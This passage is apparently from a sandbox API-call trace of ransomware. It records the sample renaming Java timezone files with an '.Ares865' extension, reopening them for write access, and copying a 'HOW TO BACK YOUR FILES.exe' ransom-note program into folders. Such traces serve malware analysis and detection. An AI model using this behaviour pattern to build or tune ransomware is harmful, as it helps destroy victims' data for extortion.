(x86)\\java\\jre7\\lib\\zi\\america\\sao_paulo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1116) returned 1 [0135.627] lstrcpyW (in: lpString1=0x2cce460, lpString2="Scoresbysund" | out: lpString1="Scoresbysund") returned="Scoresbysund" [0135.627] lstrlenW (lpString="Scoresbysund") returned 12 [0135.627] lstrlenW (lpString="Ares865") returned 7 [0135.627] lstrcmpiW (lpString1="sbysund", lpString2="Ares865") returned 1 [0135.627] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.Ares865") returned 68 [0135.628] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund.ares865"), dwFlags=0x1) returned 1 [0135.629] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1040) returned 1 [0135.632] lstrcpyW (in: lpString1=0x2cce460, lpString2="Sitka" | out: lpString1="Sitka") returned="Sitka" [0135.632] lstrlenW (lpString="Sitka") returned 5 [0135.632] lstrlenW (lpString="Ares865") returned 7 [0135.632] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.Ares865") returned 61 [0135.632] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka.ares865"), dwFlags=0x1) returned 1 [0135.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.634] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0135.637] lstrcpyW (in: lpString1=0x2cce460, lpString2="St_Johns" | out: lpString1="St_Johns") returned="St_Johns" [0135.637] lstrlenW (lpString="St_Johns") returned 8 [0135.637] lstrlenW (lpString="Ares865") returned 7 [0135.637] lstrcmpiW (lpString1="t_Johns", lpString2="Ares865") returned 1 [0135.637] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.Ares865") returned 64 [0135.638] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns.ares865"), dwFlags=0x1) returned 1 [0135.639] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Johns.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_johns.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.639] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2000) returned 1 [0135.642] lstrcpyW (in: lpString1=0x2cce460, lpString2="St_Kitts" | out: lpString1="St_Kitts") returned="St_Kitts" [0135.642] lstrlenW (lpString="St_Kitts") returned 8 [0135.642] lstrlenW (lpString="Ares865") returned 7 [0135.642] lstrcmpiW (lpString1="t_Kitts", lpString2="Ares865") returned 1 [0135.642] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts.Ares865") returned 64 [0135.642] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts.ares865"), dwFlags=0x1) returned 1 [0135.644] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Kitts.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_kitts.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.644] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.647] lstrcpyW (in: lpString1=0x2cce460, lpString2="St_Lucia" | out: lpString1="St_Lucia") returned="St_Lucia" [0135.647] lstrlenW (lpString="St_Lucia") returned 8 [0135.647] lstrlenW (lpString="Ares865") returned 7 [0135.647] lstrcmpiW (lpString1="t_Lucia", lpString2="Ares865") returned 1 [0135.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia.Ares865") returned 64 [0135.648] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia.ares865"), dwFlags=0x1) returned 1 [0135.649] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.649] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.652] lstrcpyW (in: lpString1=0x2cce460, lpString2="St_Thomas.Ares865" | out: lpString1="St_Thomas.Ares865") returned="St_Thomas.Ares865" [0135.652] lstrlenW (lpString="St_Thomas.Ares865") returned 17 [0135.652] lstrlenW (lpString="Ares865") returned 7 [0135.652] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0135.653] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="St_Vincent", cAlternateFileName="ST_VIN~1")) returned 1 [0135.653] lstrcmpiW (lpString1="St_Vincent", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0135.653] lstrcmpiW (lpString1="St_Vincent", lpString2="aoldtz.exe") returned 1 [0135.653] lstrcpyW (in: lpString1=0x2cce460, lpString2="St_Vincent" | out: lpString1="St_Vincent") returned="St_Vincent" [0135.653] lstrlenW (lpString="St_Vincent") returned 10 [0135.653] lstrlenW (lpString="Ares865") returned 7 [0135.653] lstrcmpiW (lpString1="Vincent", lpString2="Ares865") returned 1 [0135.653] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent.Ares865") returned 66 [0135.653] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent.ares865"), dwFlags=0x1) returned 1 [0135.655] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Vincent.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_vincent.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.658] lstrcpyW (in: lpString1=0x2cce460, lpString2="Swift_Current" | out: lpString1="Swift_Current") returned="Swift_Current" [0135.658] lstrlenW (lpString="Swift_Current") returned 13 [0135.658] lstrlenW (lpString="Ares865") returned 7 [0135.658] lstrcmpiW (lpString1="Current", lpString2="Ares865") returned 1 [0135.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.Ares865") returned 69 [0135.658] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current.ares865"), dwFlags=0x1) returned 1 [0135.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Swift_Current.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\swift_current.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=241) returned 1 [0135.665] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tegucigalpa" | out: lpString1="Tegucigalpa") returned="Tegucigalpa" [0135.666] lstrlenW (lpString="Tegucigalpa") returned 11 [0135.666] lstrlenW (lpString="Ares865") returned 7 [0135.666] lstrcmpiW (lpString1="cigalpa", lpString2="Ares865") returned 1 [0135.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.Ares865") returned 67 [0135.666] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa.ares865"), dwFlags=0x1) returned 1 [0135.667] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tegucigalpa.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tegucigalpa.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.667] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=121) returned 1 [0135.670] lstrcpyW (in: lpString1=0x2cce460, lpString2="Thule" | out: lpString1="Thule") returned="Thule" [0135.670] lstrlenW (lpString="Thule") returned 5 [0135.671] lstrlenW (lpString="Ares865") returned 7 [0135.671] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.Ares865") returned 61 [0135.671] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule.ares865"), dwFlags=0x1) returned 1 [0135.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.672] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=852) returned 1 [0135.675] lstrcpyW (in: lpString1=0x2cce460, lpString2="Thunder_Bay" | out: lpString1="Thunder_Bay") returned="Thunder_Bay" [0135.675] lstrlenW (lpString="Thunder_Bay") returned 11 [0135.675] lstrlenW (lpString="Ares865") returned 7 [0135.675] lstrcmpiW (lpString1="der_Bay", lpString2="Ares865") returned 1 [0135.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.Ares865") returned 67 [0135.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay.ares865"), dwFlags=0x1) returned 1 [0135.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thunder_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thunder_bay.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1188) returned 1 [0135.680] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tijuana" | out: lpString1="Tijuana") returned="Tijuana" [0135.680] lstrlenW (lpString="Tijuana") returned 7 [0135.680] lstrlenW (lpString="Ares865") returned 7 [0135.681] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.Ares865") returned 63 [0135.681] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana.ares865"), dwFlags=0x1) returned 1 [0135.682] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tijuana.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tijuana.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.683] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1276) returned 1 [0135.685] lstrcpyW (in: lpString1=0x2cce460, lpString2="Toronto" | out: lpString1="Toronto") returned="Toronto" [0135.685] lstrlenW (lpString="Toronto") returned 7 [0135.685] lstrlenW (lpString="Ares865") returned 7 [0135.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.Ares865") returned 63 [0135.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto.ares865"), dwFlags=0x1) returned 1 [0135.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.687] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1928) returned 1 [0135.690] lstrcpyW (in: lpString1=0x2cce460, lpString2="Tortola" | out: lpString1="Tortola") returned="Tortola" [0135.690] lstrlenW (lpString="Tortola") returned 7 [0135.690] lstrlenW (lpString="Ares865") returned 7 [0135.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola.Ares865") returned 63 [0135.690] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola.ares865"), dwFlags=0x1) returned 1 [0135.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Tortola.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\tortola.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.695] lstrcpyW (in: lpString1=0x2cce460, lpString2="Vancouver" | out: lpString1="Vancouver") returned="Vancouver" [0135.695] lstrlenW (lpString="Vancouver") returned 9 [0135.695] lstrlenW (lpString="Ares865") returned 7 [0135.695] lstrcmpiW (lpString1="ncouver", lpString2="Ares865") returned 1 [0135.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.Ares865") returned 65 [0135.695] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver.ares865"), dwFlags=0x1) returned 1 [0135.697] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Vancouver.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\vancouver.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1592) returned 1 [0135.700] lstrcpyW (in: lpString1=0x2cce460, lpString2="Whitehorse" | out: lpString1="Whitehorse") returned="Whitehorse" [0135.700] lstrlenW (lpString="Whitehorse") returned 10 [0135.700] lstrlenW (lpString="Ares865") returned 7 [0135.700] lstrcmpiW (lpString1="tehorse", lpString2="Ares865") returned 1 [0135.700] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.Ares865") returned 66 [0135.701] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse.ares865"), dwFlags=0x1) returned 1 [0135.702] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Whitehorse.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\whitehorse.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.702] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1108) returned 1 [0135.705] lstrcpyW (in: lpString1=0x2cce460, lpString2="Winnipeg" | out: lpString1="Winnipeg") returned="Winnipeg" [0135.705] lstrlenW (lpString="Winnipeg") returned 8 [0135.705] lstrlenW (lpString="Ares865") returned 7 [0135.705] lstrcmpiW (lpString1="innipeg", lpString2="Ares865") returned 1 [0135.706] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.Ares865") returned 64 [0135.706] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg.ares865"), dwFlags=0x1) returned 1 [0135.707] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Winnipeg.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\winnipeg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.707] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1560) returned 1 [0135.710] lstrcpyW (in: lpString1=0x2cce460, lpString2="Yakutat" | out: lpString1="Yakutat") returned="Yakutat" [0135.710] lstrlenW (lpString="Yakutat") returned 7 [0135.710] lstrlenW (lpString="Ares865") returned 7 [0135.711] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.Ares865") returned 63 [0135.711] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat.ares865"), dwFlags=0x1) returned 1 [0135.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1220) returned 1 [0135.715] lstrcpyW (in: lpString1=0x2cce460, lpString2="Yellowknife" | out: lpString1="Yellowknife") returned="Yellowknife" [0135.715] lstrlenW (lpString="Yellowknife") returned 11 [0135.715] lstrlenW (lpString="Ares865") returned 7 [0135.715] lstrcmpiW (lpString1="owknife", lpString2="Ares865") returned 1 [0135.716] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.Ares865") returned 67 [0135.716] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife.ares865"), dwFlags=0x1) returned 1 [0135.717] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yellowknife.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yellowknife.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.717] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1068) returned 1 [0135.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" [0135.720] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" [0135.721] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0135.721] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\how to back your files.exe"), bFailIfExists=1) returned 0 [0135.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0135.722] GetLastError () returned 0x0 [0135.722] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0135.722] FindFirstFileW (in: 